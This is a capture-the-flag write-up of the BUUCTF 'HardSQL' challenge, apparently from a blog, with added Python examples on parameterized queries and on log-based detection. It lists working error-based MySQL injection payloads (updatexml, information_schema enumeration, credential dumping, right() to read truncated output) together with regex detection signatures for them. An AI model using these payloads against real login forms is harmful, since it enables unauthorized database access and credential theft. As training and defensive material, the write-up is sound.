[Geek Challenge 2019] HardSQL 1

[Target]
SQL injection
[Environment]
BUUCTF
[Tools]
Browser
[Analysis]
1. Entering numbers or letters in the login form always produces the same result.

2. Trying the "universal password" style input.

A different message is displayed.
3. Entering queries in the input field.

Both attempts show the same message.

Double-writing keywords to slip past the filter is also blocked, and spaces, `=` and `union` are filtered as well.
4. We try error-based injection. There are two functions commonly used for error-based injection; here we use updatexml(a,b,c). Its arguments a and c must be of string type, so supplying a value that is not a string there makes MySQL raise an error that echoes the injected value.
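The filter described above is a keyword blacklist applied to input that is still spliced into the statement text, which is why a payload that simply avoids the blocked characters (parentheses instead of spaces, `like` instead of `=`, no `union`) gets through. The following is an added example, not code from the original write-up, contrasting that pattern with a parameterized query; it uses SQLite in memory as a stand-in for the challenge's MySQL back end, and the blacklist contents, table shape and the `/check.php`-style query text are assumptions, since the write-up only names the filtered tokens and the table `H4rDsq1`.

```python
import sqlite3

# Assumed approximation of the challenge's blacklist: the write-up only mentions
# that spaces, '=' and 'union' are filtered, so that is all this filter blocks.
BLACKLIST = (" ", "=", "union")

# The database-name payload from the write-up.
PAYLOAD = "1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#"


def passes_blacklist(value: str) -> bool:
    """True when the naive keyword filter would let the value through."""
    low = value.lower()
    return not any(bad in low for bad in BLACKLIST)


def build_concat_sql(username: str, password: str) -> str:
    """The vulnerable pattern: user input spliced into the statement text.

    The query shape is assumed; the challenge's real statement is not shown.
    With MySQL, the '#' in the payload would comment out everything after it,
    so the AND password=... clause never takes effect.
    """
    return ("SELECT id FROM H4rDsq1 WHERE username='" + username
            + "' AND password='" + password + "'")


def make_db() -> sqlite3.Connection:
    # Constructed sample table; the password value is a placeholder, not the flag.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE H4rDsq1 (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO H4rDsq1 VALUES (1, 'admin', 'placeholder-password')")
    return conn


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: placeholders carry the input as data, never as SQL text.

    The payload is compared literally against the username column, so no row
    matches and nothing is evaluated.
    """
    row = conn.execute(
        "SELECT id FROM H4rDsq1 WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("blacklist lets the payload through:", passes_blacklist(PAYLOAD))
    print("spliced statement:", build_concat_sql(PAYLOAD, "1"))
    db = make_db()
    print("parameterized login with payload ->", login_parameterized(db, PAYLOAD, "1"))
    print("parameterized login, real creds ->",
          login_parameterized(db, "admin", "placeholder-password"))
```

The point of `build_concat_sql` is visible in its return value: the `'` in the payload closes the username literal and the rest of the input becomes SQL, so whatever the blacklist blocks, the fix is to stop building statements from strings rather than to lengthen the blacklist.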
Payload:
username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1

This displays the database name.
Next, look up the tables.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1

Next, look up the columns.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=1

We get id, username and password; continue by querying the values.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=1

I found that the flag was not fully displayed, because the error message is truncated.
After some searching I learned that right() can be used to read the remaining part of the string.
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=1

Splicing the two parts together gives the flag.
Takeaway: when the output is truncated, left() and right() can be used to read a string in pieces.
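From the defender's side, every request in this write-up leaves a recognisable trace: an XML function call used only for its error message, `concat` with the `0x7e` delimiter, `information_schema` enumeration, `group_concat`, and a quote followed by `or(` with parentheses standing in for the filtered spaces. The following is an added example, not code from the original write-up, that URL-decodes request targets from access-log lines and flags those signatures. The log lines, client addresses and the `/check.php` path are constructed for the example; the injected query strings are the ones shown above. Note that these payloads were sent as POST parameters, so in practice you would need request-body logging (application or WAF logs) rather than a plain access log, which only records the URL.

```python
import re
from urllib.parse import unquote

# Constructed Apache/nginx-style access log lines (not the challenge's real logs);
# the path /check.php and the client IPs are assumptions made for this example.
LOG_LINES = [
    '10.0.0.5 - - [01/Oct/2020:10:00:01 +0000] "GET /check.php?username=alice&password=s3cret HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2020:10:00:07 +0000] "GET /check.php?username=1%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1 HTTP/1.1" 200 730',
    '10.0.0.9 - - [01/Oct/2020:10:00:12 +0000] "GET /check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1 HTTP/1.1" 200 760',
    '10.0.0.7 - - [01/Oct/2020:10:00:20 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

# Common log format: client, identity, user, [timestamp], "METHOD target HTTP/x", status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Signatures matched against the decoded, lower-cased request target.
SIGNATURES = {
    # updatexml()/extractvalue() appearing in a login parameter at all
    "xml_error_function": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    # ~ (0x7e) used as a delimiter so the leaked value is easy to spot in the error
    "tilde_delimiter": re.compile(r"concat\(\s*0x7e"),
    # schema enumeration through the information_schema views
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)"),
    "aggregation": re.compile(r"\bgroup_concat\s*\("),
    # closing quote followed by or( : parentheses in place of filtered spaces
    "quote_then_or_paren": re.compile(r"'\s*or\s*\("),
    # comment character terminating the injected fragment before the next parameter
    "comment_terminator": re.compile(r"(#|--)\s*(&|$)"),
}


def normalize(target: str, rounds: int = 3) -> str:
    """URL-decode until the text stops changing (bounded), so double encoding
    such as %2527 is undone, then lower-case for case-insensitive matching."""
    prev = target
    for _ in range(rounds):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev.lower()


def classify(target: str) -> list:
    """Return the names of all signatures that match the decoded target."""
    decoded = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines) -> list:
    """Parse each line and report those whose request target matches a signature."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hits = classify(m.group("target"))
        if hits:
            findings.append({
                "line": n,
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding)
```

A single hit such as `comment_terminator` is weak on its own; the value of the scanner is in the combination (XML error function plus tilde delimiter plus schema enumeration from one client within seconds), which is the pattern this write-up's progression from database name to table to column to row produces.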


Origin: blog.csdn.net/bring_coco/article/details/108747855